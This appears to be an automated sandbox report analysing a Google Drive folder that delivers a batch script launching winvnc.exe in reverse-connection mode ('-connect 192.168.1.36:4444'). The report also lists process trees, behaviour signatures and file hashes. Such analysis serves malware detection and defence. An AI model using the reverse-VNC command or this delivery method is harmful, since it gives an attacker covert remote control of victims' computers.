Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
-
submitted
06-08-2024 22:19
General
-
Target
https://drive.google.com/drive/folders/1o_FvCzw_5IKZ8_bm_Om9y_7MArSpq41k?usp=sharing
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 1 IoCs
-
NTFS ADS 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
-
Suspicious use of FindShellTrayWindow 38 IoCs
-
Suspicious use of SendNotifyMessage 15 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/drive/folders/1o_FvCzw_5IKZ8_bm_Om9y_7MArSpq41k?usp=sharing1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xa8,0x10c,0x7ffddae93cb8,0x7ffddae93cc8,0x7ffddae93cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5500 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2504 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3084 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,2242430465155510790,1946429006472630860,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2640 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240806T221959Z-001\client\main.bat" "1⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\Downloads\client-20240806T221959Z-001\client\winvnc.exewinvnc.exe -run2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Users\Admin\Downloads\client-20240806T221959Z-001\client\winvnc.exewinvnc.exe -connect 192.168.1.36:44442⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\client-20240806T221959Z-001\client\winvnc.exe"C:\Users\Admin\Downloads\client-20240806T221959Z-001\client\winvnc.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD59af507866fb23dace6259791c377531f
SHA15a5914fc48341ac112bfcd71b946fc0b2619f933
SHA2565fb3ec65ce1e6f47694e56a07c63e3b8af9876d80387a71f1917deae690d069f
SHA512c58c963ecd2c53f0c427f91dc41d9b2a9b766f2e04d7dae5236cb3c769d1f048e4a342ea75e4a690f3a207baa1d3add672160c1f317abfe703fd1d2216b1baf7
-
Filesize
152B
MD5b0177afa818e013394b36a04cb111278
SHA1dbc5c47e7a7df24259d67edf5fbbfa1b1fae3fe5
SHA256ffc2c53bfd37576b435309c750a5b81580a076c83019d34172f6635ff20c2a9d
SHA512d3b9e3a0a99f191edcf33f3658abd3c88afbb12d7b14d3b421b72b74d551b64d2a13d07db94c90b85606198ee6c9e52072e1017f8c8c6144c03acf509793a9db
-
Filesize
1KB
MD590cd45e012f928ec9cc96e3180d7f5a8
SHA13bd62f50f4793b5a2b1891f43e25a06d5e0a2a5c
SHA25660c8e0024763f72d69162baf46cc16f0fb3b9e9899a19385938a1056aa13b75d
SHA512feb96cdbee608ddeeb12046f1f0051162c4f183cfc02b35095b029a6e8843b78d6823733e0b537c4c51b68d8e9f27ffdaae2e5b75f0ab4ccf3e5c66096e543c3
-
Filesize
1KB
MD517f3ba8e4e5cdeab1842934a1949bb76
SHA1dec3765706d97d014a4c2395c2f918d3b6d1d4cf
SHA256768565eea5a5b9be4cfdbca8e45225d98102fa90781cf6e1dd70e58f39a35194
SHA51238ba9389dda7e5fc65a194242625a7a4a411326b6072cab700298f7f91bedbb6fe198d6be56f571a7bca0a3a3cb102d79766ca3285bf55336edb564ba114e56b
-
Filesize
1008B
MD500380b093ced95437b94ccac5863f6ea
SHA1444906c68b900e72a5408a86b8ef5a7b0a1bae60
SHA2568a154cd54f7608f60077695c5a464c2bdd88f7d1f4ed9dd7d870bcd3f5afb9ee
SHA512e883b342dd011a9a6b15d794693d30596736cf159e168b5ac9cf035566e4e104d484b36462f81270ba37392c0f028e207c09d1fdd162cfcabdc12c77e0f16a23
-
Filesize
3KB
MD50243e1d5b68cbfd0cf8e629d8c66c51e
SHA15009b27c77be7ee67e7ef57341dcf058014cacea
SHA25645952eb93dfd1b81232debf33cee7b97b9afb0c8bdebd49a2deda727a2ebc81c
SHA51275af765381dd753b0cdb1fb556da3b6eadb2541eee4df384b7aaf12410880584eec53414326b2bdbcf67c0173c0a10ec06500c09ac36c15401f3ab008463e3f0
-
Filesize
3KB
MD59e7866926b0a1823be6c57d0b2f066ab
SHA18442711b7f7185a2176ffeb934e7b2addd4e09e7
SHA2567f5fc45d00c52ff4302e01cdeac2cda0d599010c88d8ebd66479601aee5df755
SHA5127b8f114d50f359da7a75a738feca45d666a696d6bcd6a1e7f6bf4da2e4edb8fb9566dabf3621cc0e929e84a97d882070e50a8e2893e5d21c07643ea14b856e91
-
Filesize
5KB
MD5aeeab87e163121ef3b6c5d0dc47ccd46
SHA130d58c68382f79d11f79c7f23aff5a46ca3d6280
SHA256711f8f89c7c9d10bad621692e2ffe8b585bfeedc1c657bc2de2c1b7f90c680e7
SHA512a44dd6519b853db0cb2b960f92ee4e72218d9584261b2782c591e50bad1e036603df5b38a647027f0f33aac676d54f376116dbd4733f50cc664a4308df397ad2
-
Filesize
6KB
MD5b102ae7a4d8d58f1e9c832a72e7e6bc8
SHA1a4493046710112d6b4fb0b546aff198a40554a63
SHA2560296206a19982039904d80d1f7f0d069da29488e5dfca70fcf02bd8fb7148911
SHA51274d175050946836773ffe62c443436c639a21537b12c19da029bd64c40bc085468a627aeef5c11f72c74461279fa2b4b2a16a3825f95b78bd6285490818bccae
-
Filesize
1KB
MD51da5bddbe2bd744db147850704c40c25
SHA1e4fd1d47a871eab8ffc537a193b90505f090df5d
SHA2566fa5f9fe94d55bd4e8c59a28f7ebcdfc1d25b874bc85145cd8337fbc5166fb35
SHA512de2c41c1e2856ba1b9b25742eea63b549551183335becf3a06f54138c5c1d4f68926eb5d1f0ec73f4e8a002ff699d7b83bc2ae03b2f5f129c6186f793ab8a8e4
-
Filesize
1KB
MD5fa61f09ab82d37d67a4d2f8f6b4670d9
SHA13a0527fc87bec4fed24340ddb3d8fa4c3bc73955
SHA2565ddfd4a61b4911ae3e2aabe6f198e885d434c0f31ac0b3b70410806448d3b77e
SHA512c02035940ffb530de2d1420dcf57142fe33304387f535ebdbc9d8b6c604961673c35780f2bae7663a9adfe25255e1f5ce66ec867a6be1e4e4ae7b86005609fe5
-
Filesize
1KB
MD50a53075263abce64c0bad8ee5c621d0c
SHA13adb469e095a5905d491215faf602d6e28d8f8e8
SHA2565c132b9a6b97e445758cc4630215c563b8cd882c7335101b10c24d27388e72a0
SHA512ae9fd10b6b94b939880950e2705b5c2be249007db4c5f10b29debdd3d03025ccd453637440f84897babf88a3de881e2fe28275b1a3df09d7daedebc4c7140ef8
-
Filesize
1KB
MD5da0507f7a8f3d5ff63a3ec379c373a89
SHA152ca820181122c7839d480c874a44d282a560224
SHA256eea6db64519c227c5204d47e94659ab52665e95e8e6066214c6a7dd9fb5a166f
SHA512f9896fb00441b46fcb154a5cd483fad152b8387297e0a089763694471492da7498da66683238480c2abbf5915c47cb763f1439798ef843a10803a4f2ee6ebe51
-
Filesize
1KB
MD5be28ed034638785ce885cd82eb96e846
SHA136fb7e40c73e13ab3ad5bbac4a7638a591c7e006
SHA256c24c84351f17832b54b89df1758d42e7572cfca1f560e3545af29b33e99fe26a
SHA512460a41527ed4100c9f883fcc4627d4b2b2d701d9fd51e920704e440ea3ad081494f091c625c8262f7c819afc957cbce15d098d7c0c7b8de47846626d4077a831
-
Filesize
1KB
MD512831d2cea60118074dfd518cc788a3f
SHA139896b4b048e993550883d5d94fc3c6fd6a4bea7
SHA256612251219c7b63ef660802f5c26c69b842f12b1b8b79a865b71725b6ed19e568
SHA5121f047e436ec6dbfe1ffbabc7fe9db0e14522ad5c90cb6f7f35b5bc55ff38e3f806be9ee6f55f4a9fb27073254a78d9274b037c78a56c5fd35d31478a67d7466d
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5a639ba55f2fa3842805b48bc5c6d854c
SHA1ca58f57f605c821ea706675e4be9dcde58b5318e
SHA256b8da7ff3764d5e5f5604698a48f90ffd8452656e019b1639daec0160c8df0a3b
SHA5129476d29549b8d4c5631d85d56c5ef953603e826465cc91a3b23687a2585c9aa4c23d3cbcb1e12e3bc74c991042d0308121d2735faee6b01abf0125cc1dacdf6b
-
Filesize
11KB
MD553e25e8c1b5892b961b533722d8575db
SHA19f7f9781540de3c862353a41e93ba0ca8c5a856b
SHA2560377a37383099c4195037b7516143a9b0a6844aad6aa22b5e329a0a8ae48b14f
SHA512f61903044852af5d9d87f1ebb5dea6d309c0e7af972eb9293441fad57f037ab97f8ba6694a3ebb704cbc6d36d72610187523d20ff8c102a927612615799e9993
-
Filesize
1.0MB
MD578c0aad195fee063b9cdc0b2b25e6c32
SHA1520dd8dd7ab1768f6c11e775e1ae246e4e6f12c9
SHA2563f4e167aed22ae259cd5faab06d13e5e6d875ba00ccfb9f99e911a57b7ce467f
SHA512c123b71aa5712e560b10d7c056f624b47e678a28697bcbe111314c7fb333f44a38306d8665d2712235d2db3e81d9a2e4aabac1f7d22794f6ab6f589cd06df3aa
-
Filesize
220B
MD54921238b7b4c56a0841b57459b46f9fc
SHA19c705e06bc44d7202e99f4f0c8770dab147f2925
SHA2568227340d9f374b24b6abeb760cb1b2c444ced7bb1e10ea374bd1405d9be1251c
SHA512c999c4d1c43f0e6e902ebbd403ad3962c66b5362923978bff3c49a23b3718987bc4a8f480e6dddac42c6c468696e7548c3192fd84f3db5fb186b64ec274de892